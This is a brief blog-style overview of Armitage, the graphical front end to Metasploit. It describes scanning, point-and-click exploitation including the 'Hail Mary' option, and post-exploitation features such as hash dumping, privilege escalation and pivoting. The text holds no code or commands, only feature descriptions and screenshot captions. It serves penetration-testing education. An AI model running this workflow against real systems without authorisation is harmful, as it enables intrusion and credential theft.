Introduction
I am sure anyone who does penetration testing or is active in the security field knows what Metasploit is, and what it does. However, the initial learning curve for Metasploit may be daunting for security newbies who are interested in penetration testing but have no idea where to start.
Armitage is an advanced graphical representation of the Metasploit framework. Its main feature is to map each stage of penetration testing — information gathering, exploitation, and post-exploitation into a few clicks.
armitage
Information Gathering
Information gathering is the most important component for any penetration testing. Without the necessary information, there is no way to carry on an efficient penetration test. Armitage provides features for information enumeration by leveraging on nmap and other Metasploit scanning modules. The 3 main scanning features are nmap, msfscan and DNS enumeration.
msfscan will run regardless of the availability of the target host. For a more efficient scan, it would be better to first run an ARP scan or ping discovery using nmap before using msfscan.
Results returned from any scan in Armitage will be stored in its database. It will be very useful to review this information in other stages of a penetration test. Armitage also allows importing scan results from other tools such as Nessus or nmap into its database — giving users the flexibility to include results from other tools.
List of Scans:
nmap Scan Results:
Exploitation
Armitage has made the exploitation process a clicking game. By selecting "Find Attack", Armitage will shortlist exploits based on the information gathered from the previous phase.
Users can then launch the respective exploit by clicking on "Launch". All information required by the Metasploit Framework will be filled in by Armitage automatically. However, the default settings provided by Armitage might not be sufficient all the time.
Once an exploit is successful, the graphical representation of the target host will turn red.
One interesting function I'd find very interesting is "Hail Mary". It allows users to launch all exploits shortlisted by Armitage.
List of Applicable Exploits:
Options for Launching an Exploit:
Target Exploited Successfully:
Post-Exploitation
The best part of Armitage is the ability to run all the post-exploitation processes with just a few clicks.
The list of features available are:
Dump hash
Privilege escalation
Exploring the file system
Setup Pivot attack
There are additional post-exploitation modules available on the left panel. For command-line fanatic, you can choose to interact with the session and do your magic.
Post-Exploitation Options:
View Items Stored in Armitage Database:
Dumped Hashes:
Performing ARP Scan via the Exploited Host:
Attack Pivot Route
Armitage Post-Exploitation Modules:
Shared by Sunny Neo.